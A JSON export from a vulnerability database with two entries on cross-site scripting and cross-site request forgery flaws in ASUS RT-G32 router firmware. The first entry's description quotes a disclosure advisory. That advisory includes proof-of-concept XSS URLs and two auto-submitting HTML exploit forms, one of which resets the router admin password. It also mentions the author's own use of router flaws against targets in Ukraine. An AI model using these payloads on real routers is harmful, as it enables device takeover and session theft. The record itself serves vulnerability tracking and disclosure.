"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2681",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-80642",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. \nAn attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2681",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "130724",
"trust": 3.2
},
{
"db": "BID",
"id": "73296",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-80642",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"id": "VAR-201503-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
}
],
"trust": 1.12424244
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
}
]
},
"last_update_date": "2023-12-18T12:38:03.539000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-G32",
"trust": 0.8,
"url": "http://www.asus.com/networking/rtg32/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://websecurity.com.ua/7644/"
},
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2015/mar/42"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/73296"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.3,
"url": "http://www.asus.com/networking/rtg32/"
},
{
"trust": 0.1,
"url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua/7644/)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2015-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2015-03-07T11:11:11",
"db": "PACKETSTORM",
"id": "130724"
},
{
"date": "2015-03-23T16:59:09.523000",
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2016-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2016-12-03T03:05:42.517000",
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asus RT-G32 Router Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
}
}
VAR-201504-0585
Vulnerability from variot - Updated: 2022-05-17 01:47ASUS RT-G32 Router is a wireless router product from ASUS. Cross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in ASUS RT-G32 routers using firmware version 2.0.2.6 and 2.0.3.2. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication and performing unauthorized operations. Other attacks may also be possible
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201504-0585",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "2.0.3.2"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "2.0.2.6"
}
],
"sources": [
{
"db": "BID",
"id": "74378"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MustLive",
"sources": [
{
"db": "BID",
"id": "74378"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
],
"trust": 0.9
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-G32 Router is a wireless router product from ASUS. \nCross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in ASUS RT-G32 routers using firmware version 2.0.2.6 and 2.0.3.2. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication and performing unauthorized operations. Other attacks may also be possible",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
},
{
"db": "BID",
"id": "74378"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "74378",
"trust": 0.9
},
{
"db": "CNNVD",
"id": "CNNVD-201505-354",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "74378"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
]
},
"id": "VAR-201504-0585",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.42424244
},
"last_update_date": "2022-05-17T01:47:57.658000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/74378"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.3,
"url": "http://www.asus.com/networking/rtg32/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2015/apr/86"
}
],
"sources": [
{
"db": "BID",
"id": "74378"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "74378"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-26T00:00:00",
"db": "BID",
"id": "74378"
},
{
"date": "2015-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-26T00:00:00",
"db": "BID",
"id": "74378"
},
{
"date": "2015-05-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-G32 Router Cross-Site Scripting Vulnerability and Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201505-354"
}
],
"trust": 0.6
}
}